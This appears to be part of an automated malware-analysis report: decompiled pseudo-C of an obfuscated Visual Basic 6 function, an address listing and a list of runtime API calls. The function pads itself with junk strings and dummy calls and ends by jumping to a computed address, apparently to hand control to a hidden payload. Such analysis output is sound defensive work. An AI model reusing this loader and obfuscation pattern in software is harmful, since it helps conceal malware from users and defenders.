      				short _v76;
      				intOrPtr _v80;
      				short _v84;
      				intOrPtr _v96;
      				char _v108;
      				void* _v116;
      				short _v120;
      				signed int _v124;
      				char _v128;
      				char _v132;
      				void* _v140;
      				char _v148;
      				signed int _v156;
      				char _v164;
      				signed int _v172;
      				char _v180;
      				signed int _v188;
      				char _v196;
      				signed int _v200;
      				signed int _v204;
      				char _v212;
      				signed int _v220;
      				char _v228;
      				char _v264;
      				char _v268;
      				char _v272;
      				char _v276;
      				intOrPtr _v280;
      				char _v284;
      				signed int _v288;
      				signed int _v292;
      				void* _v296;
      				signed int _v300;
      				signed int _v324;
      				intOrPtr* _v328;
      				signed int _v332;
      				signed int _v336;
      				signed int _v340;
      				signed int _v344;
      				signed int _v348;
      				signed int _v352;
      				signed int _v356;
      				signed int _v360;
      				intOrPtr* _v364;
      				signed int _v368;
      				signed int _v372;
      				intOrPtr* _v376;
      				signed int _v380;
      				signed int _v384;
      				intOrPtr* _v388;
      				signed int _v392;
      				signed int _v396;
      				signed int _v400;
      				signed int _v404;
      				signed int _v408;
      				signed int _v412;
      				signed int _v416;
      				signed int _t441;
      				signed int _t445;
      				signed int _t449;
      				void* _t453;
      				void* _t454;
      				char* _t455;
      				signed int _t458;
      				signed int _t459;
      				char* _t462;
      				signed short _t463;
      				signed int _t470;
      				signed int _t477;
      				signed int _t482;
      				intOrPtr* _t483;
      				signed int _t493;
      				signed int _t507;
      				signed int _t512;
      				signed int _t520;
      				signed int _t527;
      				signed int _t533;
      				char* _t536;
      				char* _t538;
      				char* _t542;
      				signed int _t548;
      				signed int _t555;
      				signed int _t560;
      				signed int _t562;
      				signed int _t569;
      				signed int _t580;
      				char* _t590;
      				intOrPtr _t592;
      				signed int* _t597;
      				signed int* _t599;
      				char* _t622;
      				void* _t635;
      				void* _t637;
      				intOrPtr _t638;
      				long long* _t639;
      				void* _t653;
      				signed int _t662;
      				long long _t674;
      				long long _t675;
      
      				_t638 = _t637 - 0x18;
      				 *[fs:0x0] = _t638;
      				L004013D0();
      				_v28 = _t638;
      				_v24 = 0x4012c0;
      				_v20 = _a4 & 0x00000001;
      				_a4 = _a4 & 0xfffffffe;
      				_v16 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4013d6, _t635);
      				_v8 = 1;
      				_push(5);
      				_push(0x414198);
      				_push( &_v108);
      				L0040151A();
      				_v8 = 2;
      				if( *0x41d4b0 != 0) {
      					_v328 = 0x41d4b0;
      				} else {
      					_push(0x41d4b0);
      					_push(0x413b0c);
      					L00401628();
      					_v328 = 0x41d4b0;
      				}
      				_v288 =  *_v328;
      				_t441 =  *((intOrPtr*)( *_v288 + 0x14))(_v288,  &_v132);
      				asm("fclex");
      				_v292 = _t441;
      				if(_v292 >= 0) {
      					_v332 = _v332 & 0x00000000;
      				} else {
      					_push(0x14);
      					_push(0x413afc);
      					_push(_v288);
      					_push(_v292);
      					L00401622();
      					_v332 = _t441;
      				}
      				_v296 = _v132;
      				_t445 =  *((intOrPtr*)( *_v296 + 0x138))(_v296, L"IKLDENDES", 1);
      				asm("fclex");
      				_v300 = _t445;
      				if(_v300 >= 0) {
      					_v336 = _v336 & 0x00000000;
      				} else {
      					_push(0x138);
      					_push(0x413fd0);
      					_push(_v296);
      					_push(_v300);
      					L00401622();
      					_v336 = _t445;
      				}
      				L004015D4();
      				_v8 = 3;
      				_t449 =  *((intOrPtr*)( *_a4 + 0xa8))(_a4,  &_v124);
      				asm("fclex");
      				_v288 = _t449;
      				if(_v288 >= 0) {
      					_v340 = _v340 & 0x00000000;
      				} else {
      					_push(0xa8);
      					_push(0x4120bc);
      					_push(_a4);
      					_push(_v288);
      					L00401622();
      					_v340 = _t449;
      				}
      				_push(_v124);
      				_push(0);
      				L0040152C();
      				asm("sbb eax, eax");
      				_v292 =  ~( ~_t449 + 1);
      				L0040161C();
      				_t453 = _v292;
      				if(_t453 != 0) {
      					_v8 = 4;
      					L0040159E();
      				}
      				_v8 = 6;
      				E004138B0();
      				_v272 = _t453;
      				L0040164C();
      				if(_v272 == 0x5f2b0e) {
      					_v8 = 7;
      					_v220 = 0x80020004;
      					_v228 = 0xa;
      					_v204 = 0x80020004;
      					_v212 = 0xa;
      					L004013D0();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					L004013D0();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t580 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
      					asm("fclex");
      					_v288 = _t580;
      					if(_v288 >= 0) {
      						_v344 = _v344 & 0x00000000;
      					} else {
      						_push(0x2b0);
      						_push(0x4120bc);
      						_push(_a4);
      						_push(_v288);
      						L00401622();
      						_v344 = _t580;
      					}
      				}
      				_v8 = 9;
      				_v140 = 0x80020004;
      				_v148 = 0xa;
      				_t454 =  &_v148;
      				_push(_t454);
      				L0040148A();
      				_v120 = _t454;
      				L0040160A();
      				_v8 = 0xa;
      				_push(0x413708);
      				_push(L"2-12");
      				L00401538();
      				L0040162E();
      				_push(_t454);
      				_push(0x414244);
      				L00401538();
      				L0040162E();
      				_push(_t454);
      				_push(0x414174);
      				L00401538();
      				_v140 = _t454;
      				_v148 = 8;
      				_t455 =  &_v148;
      				_push(_t455); // executed
      				L00401484(); // executed
      				_v288 =  ~(0 | _t455 != 0x0000ffff);
      				_push( &_v128);
      				_push( &_v124);
      				_push(2);
      				L00401634();
      				_t639 = _t638 + 0xc;
      				_t590 =  &_v148;
      				L0040160A();
      				_t458 = _v288;
      				if(_t458 != 0) {
      					_v8 = 0xb;
      					L004015CE();
      					_v140 =  *0x4013c4;
      					 *_t639 =  *0x4013c0;
      					_v148 =  *0x4013bc;
      					_t674 =  *0x4013b8;
      					 *_t639 = _t674;
      					_t458 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t590, _t590, _t590, _t590, _t458);
      					asm("fclex");
      					_v288 = _t458;
      					if(_v288 >= 0) {
      						_v348 = _v348 & 0x00000000;
      					} else {
      						_push(0x2c8);
      						_push(0x4120bc);
      						_push(_a4);
      						_push(_v288);
      						L00401622();
      						_v348 = _t458;
      					}
      				}
      				_v8 = 0xd;
      				_v288 = _v288 & 0x00000000;
      				if(_v288 >= 2) {
      					L00401514();
      					_v352 = _t458;
      				} else {
      					_v352 = _v352 & 0x00000000;
      				}
      				_t459 = _v288;
      				asm("fld1");
      				 *((long long*)(_v96 + _t459 * 8)) = _t674;
      				_v8 = 0xe;
      				_v288 = 1;
      				_t653 = _v288 - 2;
      				if(_t653 >= 0) {
      					L00401514();
      					_v356 = _t459;
      				} else {
      					_v356 = _v356 & 0x00000000;
      				}
      				_t592 = _v96;
      				_t675 =  *0x4011e0;
      				 *((long long*)(_t592 + _v288 * 8)) = _t675;
      				_v8 = 0xf;
      				_v272 =  &_v108;
      				_t462 =  &_v272;
      				_push(_t462);
      				asm("fld1");
      				_push(_t592);
      				_push(_t592);
      				 *_t639 = _t675;
      				L0040147E();
      				L004014F0();
      				asm("fcomp qword [0x4013b0]");
      				asm("fnstsw ax");
      				asm("sahf");
      				if(_t653 != 0) {
      					_v8 = 0x10;
      					L00401598();
      					_t562 =  &_v132;
      					L004015F8();
      					_v288 = _t562;
      					_v188 = 0x80020004;
      					_v196 = 0xa;
      					_v172 = 0x80020004;
      					_v180 = 0xa;
      					_v156 = 0x80020004;
      					_v164 = 0xa;
      					_v140 = 0x80020004;
      					_v148 = 0xa;
      					_t569 =  *((intOrPtr*)( *_v288 + 0x44))(_v288, 0x1e2b,  &_v148,  &_v164,  &_v180,  &_v196, _t562, _t462);
      					asm("fclex");
      					_v292 = _t569;
      					if(_v292 >= 0) {
      						_v360 = _v360 & 0x00000000;
      					} else {
      						_push(0x44);
      						_push(0x413e40);
      						_push(_v288);
      						_push(_v292);
      						L00401622();
      						_v360 = _t569;
      					}
      					L004015D4();
      					_push( &_v196);
      					_push( &_v180);
      					_push( &_v164);
      					_push( &_v148);
      					_push(4);
      					L00401592();
      					_t639 = _t639 + 0x14;
      				}
      				_v8 = 0x12;
      				_v140 = 0x6b23;
      				_v148 = 2;
      				_t463 =  &_v148;
      				_push(_t463);
      				L00401478();
      				asm("sbb eax, eax");
      				_v288 =  ~( ~( ~_t463));
      				L0040160A();
      				if(_v288 != 0) {
      					_v8 = 0x13;
      					_v8 = 0x14;
      					_v204 = L"SITZMARKS";
      					_v212 = 8;
      					L004015B6();
      					_push( &_v148);
      					L004015B0();
      					L0040162E();
      					L0040160A();
      				}
      				_v8 = 0x16;
      				_push( &_v148);
      				L0040146C();
      				_v204 = L"snuffingly";
      				_v212 = 0x8008;
      				_push( &_v148);
      				_t470 =  &_v212;
      				_push(_t470);
      				L00401472();
      				_v288 = _t470;
      				L0040160A();
      				if(_v288 != 0) {
      					_v8 = 0x17;
      					if( *0x41d4b0 != 0) {
      						_v364 = 0x41d4b0;
      					} else {
      						_push(0x41d4b0);
      						_push(0x413b0c);
      						L00401628();
      						_v364 = 0x41d4b0;
      					}
      					_v288 =  *_v364;
      					_t555 =  *((intOrPtr*)( *_v288 + 0x1c))(_v288,  &_v132);
      					asm("fclex");
      					_v292 = _t555;
      					if(_v292 >= 0) {
      						_v368 = _v368 & 0x00000000;
      					} else {
      						_push(0x1c);
      						_push(0x413afc);
      						_push(_v288);
      						_push(_v292);
      						L00401622();
      						_v368 = _t555;
      					}
      					_v296 = _v132;
      					_v204 = 0x80020004;
      					_v212 = 0xa;
      					L004013D0();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t560 =  *((intOrPtr*)( *_v296 + 0x60))(_v296, L"Bldestes2", 0x10);
      					asm("fclex");
      					_v300 = _t560;
      					if(_v300 >= 0) {
      						_v372 = _v372 & 0x00000000;
      					} else {
      						_push(0x60);
      						_push(0x413bec);
      						_push(_v296);
      						_push(_v300);
      						L00401622();
      						_v372 = _t560;
      					}
      					L004015D4();
      				}
      				_v8 = 0x19;
      				if( *0x41d4b0 != 0) {
      					_v376 = 0x41d4b0;
      				} else {
      					_push(0x41d4b0);
      					_push(0x413b0c);
      					L00401628();
      					_v376 = 0x41d4b0;
      				}
      				_v288 =  *_v376;
      				_t477 =  *((intOrPtr*)( *_v288 + 0x14))(_v288,  &_v132);
      				asm("fclex");
      				_v292 = _t477;
      				if(_v292 >= 0) {
      					_v380 = _v380 & 0x00000000;
      				} else {
      					_push(0x14);
      					_push(0x413afc);
      					_push(_v288);
      					_push(_v292);
      					L00401622();
      					_v380 = _t477;
      				}
      				_v296 = _v132;
      				_t482 =  *((intOrPtr*)( *_v296 + 0x108))(_v296,  &_v264);
      				asm("fclex");
      				_v300 = _t482;
      				_t662 = _v300;
      				if(_t662 >= 0) {
      					_v384 = _v384 & 0x00000000;
      				} else {
      					_push(0x108);
      					_push(0x413fd0);
      					_push(_v296);
      					_push(_v300);
      					L00401622();
      					_v384 = _t482;
      				}
      				_t483 = _v264;
      				_v76 = _t483;
      				L004015D4();
      				_v8 = 0x1a;
      				asm("fldz");
      				L00401436();
      				L004014F0();
      				asm("fcomp qword [0x4013b0]");
      				asm("fnstsw ax");
      				asm("sahf");
      				if(_t662 != 0) {
      					_v8 = 0x1b;
      					_v8 = 0x1c;
      					 *_t483 =  *_t483 + _t483;
      					if( *0x41d4b0 != 0) {
      						_v388 = 0x41d4b0;
      					} else {
      						_push(0x41d4b0);
      						_push(0x413b0c);
      						L00401628();
      						_v388 = 0x41d4b0;
      					}
      					_v288 =  *_v388;
      					_t548 =  *((intOrPtr*)( *_v288 + 0x48))(_v288, 0x15,  &_v124);
      					asm("fclex");
      					_v292 = _t548;
      					if(_v292 >= 0) {
      						_v392 = _v392 & 0x00000000;
      					} else {
      						_push(0x48);
      						_push(0x413afc);
      						_push(_v288);
      						_push(_v292);
      						L00401622();
      						_v392 = _t548;
      					}
      					_v324 = _v124;
      					_v124 = _v124 & 0x00000000;
      					L0040162E();
      				}
      				_v8 = 0x1e;
      				_v264 = 0xc76;
      				L0040163A();
      				_v276 =  *0x4013a8;
      				_v284 =  *0x4013a0;
      				_v272 = 0x67ab96;
      				_t597 =  &_v124;
      				L0040163A();
      				_t493 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v124, 0x300b,  &_v272, 0x57d5,  &_v284, 0x3542,  &_v276,  &_v128,  &_v264,  &_v268);
      				_v288 = _t493;
      				if(_v288 >= 0) {
      					_v396 = _v396 & 0x00000000;
      				} else {
      					_push(0x6f8);
      					_push(0x4120ec);
      					_push(_a4);
      					_push(_v288);
      					L00401622();
      					_v396 = _t493;
      				}
      				_v84 = _v268;
      				L00401634();
      				_v8 = 0x1f;
      				_v284 = 0x17039750;
      				_v280 = 0x5b07;
      				_v268 = 0x26c5;
      				_v264 = 0x2d3d;
      				_v272 = 0x595b86;
      				 *((intOrPtr*)(_t639 + 0xc)) =  *0x401398;
      				 *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t597,  &_v272, 0x20d892d0, 0x5afd,  &_v264, L"bronchoblennorrhea",  &_v268,  &_v284, L"unappetisingly", 2,  &_v124,  &_v128);
      				_v8 = 0x20;
      				L0040163A();
      				_t507 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x662dfd10, 0x5af4, 0xebf5a,  &_v124);
      				_v288 = _t507;
      				if(_v288 >= 0) {
      					_v400 = _v400 & 0x00000000;
      				} else {
      					_push(0x6fc);
      					_push(0x4120ec);
      					_push(_a4);
      					_push(_v288);
      					L00401622();
      					_v400 = _t507;
      				}
      				_t599 =  &_v124;
      				L0040161C();
      				_v8 = 0x21;
      				_v284 = 0xdf3437c0;
      				_v280 = 0x5b07;
      				_v272 = 0x48ddc3;
      				_v292 =  *0x401390;
      				_t512 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v272, 0x5391, _t599, _t599,  &_v284);
      				_v288 = _t512;
      				if(_v288 >= 0) {
      					_v404 = _v404 & 0x00000000;
      				} else {
      					_push(0x700);
      					_push(0x4120ec);
      					_push(_a4);
      					_push(_v288);
      					L00401622();
      					_v404 = _t512;
      				}
      				_v8 = 0x22;
      				_v272 = 0x6ee95b;
      				_v264 = 0x163b;
      				L0040163A();
      				L0040163A();
      				_t520 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x70d3c6,  &_v124,  &_v128,  &_v264, 0x3b9b,  &_v272,  &_v276);
      				_v288 = _t520;
      				if(_v288 >= 0) {
      					_v408 = _v408 & 0x00000000;
      				} else {
      					_push(0x704);
      					_push(0x4120ec);
      					_push(_a4);
      					_push(_v288);
      					L00401622();
      					_v408 = _t520;
      				}
      				_v80 = _v276;
      				L00401634();
      				_v8 = 0x23;
      				L00401532();
      				_v8 = 0x24;
      				_t527 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v264, 0xffffffff, 2,  &_v124,  &_v128);
      				asm("fclex");
      				_v288 = _t527;
      				if(_v288 >= 0) {
      					_v412 = _v412 & 0x00000000;
      				} else {
      					_push(0x1b8);
      					_push(0x4120bc);
      					_push(_a4);
      					_push(_v288);
      					L00401622();
      					_v412 = _t527;
      				}
      				_t533 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
      				asm("fclex");
      				_v292 = _t533;
      				if(_v292 >= 0) {
      					_v416 = _v416 & 0x00000000;
      				} else {
      					_push(0x1bc);
      					_push(0x4120bc);
      					_push(_a4);
      					_push(_v292);
      					L00401622();
      					_v416 = _t533;
      				}
      				_v8 = 0x25;
      				_v204 = _v204 & 0x00000000;
      				_v200 = _v200 & 0x00000000;
      				_v212 = 6;
      				L004015AA();
      				while(1) {
      					_v8 = 0x27;
      					_v204 = 1;
      					_v212 = 2;
      					_push( &_v72);
      					_push( &_v212);
      					_t536 =  &_v148;
      					_push(_t536);
      					L0040154A();
      					_t622 = _t536;
      					L004015AA();
      					_v8 = 0x28;
      					_v204 = 0x2ffff;
      					_v212 = 0x8003;
      					_push( &_v72);
      					_t538 =  &_v212;
      					_push(_t538);
      					L00401466();
      					if(_t538 == 0) {
      						break;
      					}
      				}
      				_v8 = 0x2b;
      				_v204 = 0xff8a3387;
      				do {
      					_t622 = _t622 + 1;
      				} while (_t622 != 0xffcbf0f5);
      				_v380(_t622 + 0x74a08d);
      				L004015AA();
      				_v20 = 0;
      				asm("wait");
      				_push(0x41be12);
      				L0040161C();
      				L0040160A();
      				L0040160A();
      				_v272 =  &_v108;
      				_t542 =  &_v272;
      				_push(_t542);
      				_push(0);
      				L00401586();
      				L0040161C();
      				return _t542;
      			}














































































































      0x0041af58
      0x0041af67
      0x0041af73
      0x0041af7b
      0x0041af7e
      0x0041af8b
      0x0041af94
      0x0041af97
      0x0041afa6
      0x0041afa9
      0x0041afb0
      0x0041afb2
      0x0041afba
      0x0041afbb
      0x0041afc0
      0x0041afce
      0x0041afeb
      0x0041afd0
      0x0041afd0
      0x0041afd5
      0x0041afda
      0x0041afdf
      0x0041afdf
      0x0041affd
      0x0041b015
      0x0041b018
      0x0041b01a
      0x0041b027
      0x0041b049
      0x0041b029
      0x0041b029
      0x0041b02b
      0x0041b030
      0x0041b036
      0x0041b03c
      0x0041b041
      0x0041b041
      0x0041b053
      0x0041b06e
      0x0041b074
      0x0041b076
      0x0041b083
      0x0041b0a8
      0x0041b085
      0x0041b085
      0x0041b08a
      0x0041b08f
      0x0041b095
      0x0041b09b
      0x0041b0a0
      0x0041b0a0
      0x0041b0b2
      0x0041b0b7
      0x0041b0ca
      0x0041b0d0
      0x0041b0d2
      0x0041b0df
      0x0041b101
      0x0041b0e1
      0x0041b0e1
      0x0041b0e6
      0x0041b0eb
      0x0041b0ee
      0x0041b0f4
      0x0041b0f9
      0x0041b0f9
      0x0041b108
      0x0041b10b
      0x0041b10d
      0x0041b114
      0x0041b119
      0x0041b123
      0x0041b128
      0x0041b131
      0x0041b133
      0x0041b13a
      0x0041b13a
      0x0041b13f
      0x0041b146
      0x0041b14b
      0x0041b151
      0x0041b160
      0x0041b166
      0x0041b16d
      0x0041b177
      0x0041b181
      0x0041b18b
      0x0041b198
      0x0041b1a5
      0x0041b1a6
      0x0041b1a7
      0x0041b1a8
      0x0041b1ac
      0x0041b1b9
      0x0041b1ba
      0x0041b1bb
      0x0041b1bc
      0x0041b1c5
      0x0041b1cb
      0x0041b1cd
      0x0041b1da
      0x0041b1fc
      0x0041b1dc
      0x0041b1dc
      0x0041b1e1
      0x0041b1e6
      0x0041b1e9
      0x0041b1ef
      0x0041b1f4
      0x0041b1f4
      0x0041b1da
      0x0041b203
      0x0041b20a
      0x0041b214
      0x0041b21e
      0x0041b224
      0x0041b225
      0x0041b22a
      0x0041b234
      0x0041b239
      0x0041b240
      0x0041b245
      0x0041b24a
      0x0041b254
      0x0041b259
      0x0041b25a
      0x0041b25f
      0x0041b269
      0x0041b26e
      0x0041b26f
      0x0041b274
      0x0041b279
      0x0041b27f
      0x0041b289
      0x0041b28f
      0x0041b290
      0x0041b2a0
      0x0041b2aa
      0x0041b2ae
      0x0041b2af
      0x0041b2b1
      0x0041b2b6
      0x0041b2b9
      0x0041b2bf
      0x0041b2c4
      0x0041b2cd
      0x0041b2d3
      0x0041b2e0
      0x0041b2ed
      0x0041b2f7
      0x0041b301
      0x0041b304
      0x0041b30b
      0x0041b318
      0x0041b31e
      0x0041b320
      0x0041b32d
      0x0041b34f
      0x0041b32f
      0x0041b32f
      0x0041b334
      0x0041b339
      0x0041b33c
      0x0041b342
      0x0041b347
      0x0041b347
      0x0041b32d
      0x0041b356
      0x0041b35d
      0x0041b36b
      0x0041b376
      0x0041b37b
      0x0041b36d
      0x0041b36d
      0x0041b36d
      0x0041b381
      0x0041b38a
      0x0041b38c
      0x0041b38f
      0x0041b396
      0x0041b3a0
      0x0041b3a7
      0x0041b3b2
      0x0041b3b7
      0x0041b3a9
      0x0041b3a9
      0x0041b3a9
      0x0041b3c3
      0x0041b3c6
      0x0041b3cc
      0x0041b3cf
      0x0041b3d9
      0x0041b3df
      0x0041b3e5
      0x0041b3e6
      0x0041b3e8
      0x0041b3e9
      0x0041b3ea
      0x0041b3ed
      0x0041b3f2
      0x0041b3f7
      0x0041b3fd
      0x0041b3ff
      0x0041b400
      0x0041b406
      0x0041b40d
      0x0041b413
      0x0041b417
      0x0041b41c
      0x0041b422
      0x0041b42c
      0x0041b436
      0x0041b440
      0x0041b44a
      0x0041b454
      0x0041b45e
      0x0041b468
      0x0041b4a1
      0x0041b4a4
      0x0041b4a6
      0x0041b4b3
      0x0041b4d5
      0x0041b4b5
      0x0041b4b5
      0x0041b4b7
      0x0041b4bc
      0x0041b4c2
      0x0041b4c8
      0x0041b4cd
      0x0041b4cd
      0x0041b4df
      0x0041b4ea
      0x0041b4f1
      0x0041b4f8
      0x0041b4ff
      0x0041b500
      0x0041b502
      0x0041b507
      0x0041b507
      0x0041b50a
      0x0041b511
      0x0041b51b
      0x0041b525
      0x0041b52b
      0x0041b52c
      0x0041b534
      0x0041b53a
      0x0041b547
      0x0041b555
      0x0041b557
      0x0041b55e
      0x0041b565
      0x0041b56f
      0x0041b585
      0x0041b590
      0x0041b591
      0x0041b59b
      0x0041b5a6
      0x0041b5a6
      0x0041b5ab
      0x0041b5b8
      0x0041b5b9
      0x0041b5be
      0x0041b5c8
      0x0041b5d8
      0x0041b5d9
      0x0041b5df
      0x0041b5e0
      0x0041b5e5
      0x0041b5f2
      0x0041b600
      0x0041b606
      0x0041b614
      0x0041b631
      0x0041b616
      0x0041b616
      0x0041b61b
      0x0041b620
      0x0041b625
      0x0041b625
      0x0041b643
      0x0041b65b
      0x0041b65e
      0x0041b660
      0x0041b66d
      0x0041b68f
      0x0041b66f
      0x0041b66f
      0x0041b671
      0x0041b676
      0x0041b67c
      0x0041b682
      0x0041b687
      0x0041b687
      0x0041b699
      0x0041b69f
      0x0041b6a9
      0x0041b6b6
      0x0041b6c3
      0x0041b6c4
      0x0041b6c5
      0x0041b6c6
      0x0041b6da
      0x0041b6dd
      0x0041b6df
      0x0041b6ec
      0x0041b70e
      0x0041b6ee
      0x0041b6ee
      0x0041b6f0
      0x0041b6f5
      0x0041b6fb
      0x0041b701
      0x0041b706
      0x0041b706
      0x0041b718
      0x0041b718
      0x0041b71d
      0x0041b72b
      0x0041b748
      0x0041b72d
      0x0041b72d
      0x0041b732
      0x0041b737
      0x0041b73c
      0x0041b73c
      0x0041b75a
      0x0041b772
      0x0041b775
      0x0041b777
      0x0041b784
      0x0041b7a6
      0x0041b786
      0x0041b786
      0x0041b788
      0x0041b78d
      0x0041b793
      0x0041b799
      0x0041b79e
      0x0041b79e
      0x0041b7b0
      0x0041b7cb
      0x0041b7d1
      0x0041b7d3
      0x0041b7d9
      0x0041b7e0
      0x0041b805
      0x0041b7e2
      0x0041b7e2
      0x0041b7e7
      0x0041b7ec
      0x0041b7f2
      0x0041b7f8
      0x0041b7fd
      0x0041b7fd
      0x0041b80c
      0x0041b813
      0x0041b81a
      0x0041b81f
      0x0041b826
      0x0041b828
      0x0041b82d
      0x0041b832
      0x0041b838
      0x0041b83a
      0x0041b83b
      0x0041b841
      0x0041b848
      0x0041b84d
      0x0041b856
      0x0041b873
      0x0041b858
      0x0041b858
      0x0041b85d
      0x0041b862
      0x0041b867
      0x0041b867
      0x0041b885
      0x0041b89f
      0x0041b8a2
      0x0041b8a4
      0x0041b8b1
      0x0041b8d3
      0x0041b8b3
      0x0041b8b3
      0x0041b8b5
      0x0041b8ba
      0x0041b8c0
      0x0041b8c6
      0x0041b8cb
      0x0041b8cb
      0x0041b8dd
      0x0041b8e3
      0x0041b8f0
      0x0041b8f0
      0x0041b8f5
      0x0041b8fc
      0x0041b90d
      0x0041b918
      0x0041b924
      0x0041b92a
      0x0041b939
      0x0041b93c
      0x0041b983
      0x0041b989
      0x0041b996
      0x0041b9b8
      0x0041b998
      0x0041b998
      0x0041b99d
      0x0041b9a2
      0x0041b9a5
      0x0041b9ab
      0x0041b9b0
      0x0041b9b0
      0x0041b9c6
      0x0041b9d4
      0x0041b9dc
      0x0041b9e3
      0x0041b9ed
      0x0041b9f7
      0x0041ba00
      0x0041ba09
      0x0041ba4a
      0x0041ba55
      0x0041ba5b
      0x0041ba6a
      0x0041ba8a
      0x0041ba90
      0x0041ba9d
      0x0041babf
      0x0041ba9f
      0x0041ba9f
      0x0041baa4
      0x0041baa9
      0x0041baac
      0x0041bab2
      0x0041bab7
      0x0041bab7
      0x0041bac6
      0x0041bac9
      0x0041bace
      0x0041bad5
      0x0041badf
      0x0041bae9
      0x0041bb02
      0x0041bb19
      0x0041bb1f
      0x0041bb2c
      0x0041bb4e
      0x0041bb2e
      0x0041bb2e
      0x0041bb33
      0x0041bb38
      0x0041bb3b
      0x0041bb41
      0x0041bb46
      0x0041bb46
      0x0041bb55
      0x0041bb5c
      0x0041bb66
      0x0041bb77
      0x0041bb84
      0x0041bbb8
      0x0041bbbe
      0x0041bbcb
      0x0041bbed
      0x0041bbcd
      0x0041bbcd
      0x0041bbd2
      0x0041bbd7
      0x0041bbda
      0x0041bbe0
      0x0041bbe5
      0x0041bbe5
      0x0041bbfa
      0x0041bc07
      0x0041bc0f
      0x0041bc18
      0x0041bc1d
      0x0041bc33
      0x0041bc39
      0x0041bc3b
      0x0041bc48
      0x0041bc6a
      0x0041bc4a
      0x0041bc4a
      0x0041bc4f
      0x0041bc54
      0x0041bc57
      0x0041bc5d
      0x0041bc62
      0x0041bc62
      0x0041bc86
      0x0041bc8c
      0x0041bc8e
      0x0041bc9b
      0x0041bcbd
      0x0041bc9d
      0x0041bc9d
      0x0041bca2
      0x0041bca7
      0x0041bcaa
      0x0041bcb0
      0x0041bcb5
      0x0041bcb5
      0x0041bcc4
      0x0041bccb
      0x0041bcd2
      0x0041bcd9
      0x0041bcec
      0x0041bcf1
      0x0041bcf1
      0x0041bcf8
      0x0041bd02
      0x0041bd0f
      0x0041bd16
      0x0041bd17
      0x0041bd1d
      0x0041bd1e
      0x0041bd23
      0x0041bd28
      0x0041bd2d
      0x0041bd34
      0x0041bd3e
      0x0041bd4b
      0x0041bd4c
      0x0041bd52
      0x0041bd53
      0x0041bd5d
      0x00000000
      0x00000000
      0x0041bd5f
      0x0041bd61
      0x0041bd68
      0x0041bd72
      0x0041bd72
      0x0041bd73
      0x0041bd82
      0x0041bd85
      0x0041bd8a
      0x0041bd91
      0x0041bd92
      0x0041bddd
      0x0041bde5
      0x0041bded
      0x0041bdf5
      0x0041bdfb
      0x0041be01
      0x0041be02
      0x0041be04
      0x0041be0c
      0x0041be11

      APIs
      • __vbaChkstk.MSVBVM60(?,004013D6), ref: 0041AF73
      • __vbaAryConstruct2.MSVBVM60(?,00414198,00000005,?,?,?,?,004013D6), ref: 0041AFBB
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,?,00414198,00000005,?,?,?,?,004013D6), ref: 0041AFDA
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413AFC,00000014), ref: 0041B03C
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413FD0,00000138), ref: 0041B09B
      • __vbaFreeObj.MSVBVM60(00000000,?,00413FD0,00000138), ref: 0041B0B2
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120BC,000000A8), ref: 0041B0F4
      • __vbaStrCmp.MSVBVM60(00000000,?), ref: 0041B10D
      • __vbaFreeStr.MSVBVM60(00000000,?), ref: 0041B123
      • __vbaEnd.MSVBVM60(00000000,?), ref: 0041B13A
      • __vbaSetSystemError.MSVBVM60(00000000,?), ref: 0041B151
      • __vbaChkstk.MSVBVM60(00000000,?), ref: 0041B198
      • __vbaChkstk.MSVBVM60(00000000,?), ref: 0041B1AC
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120BC,000002B0), ref: 0041B1EF
      • #648.MSVBVM60(0000000A,00000000,?), ref: 0041B225
      • __vbaFreeVar.MSVBVM60(0000000A,00000000,?), ref: 0041B234
      • __vbaStrCat.MSVBVM60(2-12,00413708,0000000A,00000000,?), ref: 0041B24A
      • __vbaStrMove.MSVBVM60(2-12,00413708,0000000A,00000000,?), ref: 0041B254
      • __vbaStrCat.MSVBVM60(00414244,00000000,2-12,00413708,0000000A,00000000,?), ref: 0041B25F
      • __vbaStrMove.MSVBVM60(00414244,00000000,2-12,00413708,0000000A,00000000,?), ref: 0041B269
      • __vbaStrCat.MSVBVM60(00414174,00000000,00414244,00000000,2-12,00413708,0000000A,00000000,?), ref: 0041B274
      • #557.MSVBVM60(00000008,00414174,00000000,00414244,00000000,2-12,00413708,0000000A,00000000,?), ref: 0041B290
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000008,00414174,00000000,00414244,00000000,2-12,00413708,0000000A,00000000,?), ref: 0041B2B1
      • __vbaFreeVar.MSVBVM60(?,?,004013D6), ref: 0041B2BF
      • __vbaFpI4.MSVBVM60(?,?,004013D6), ref: 0041B2E0
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120BC,000002C8), ref: 0041B342
      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041B376
      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041B3B2
      • #684.MSVBVM60(?,?,?), ref: 0041B3ED
      • __vbaFpR8.MSVBVM60(?,?,?), ref: 0041B3F2
      • #685.MSVBVM60(?,?,?), ref: 0041B40D
      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?), ref: 0041B417
      • __vbaHresultCheckObj.MSVBVM60(?,00000002,00413E40,00000044), ref: 0041B4C8
      • __vbaFreeObj.MSVBVM60(?,00000002,00413E40,00000044), ref: 0041B4DF
      • __vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041B502
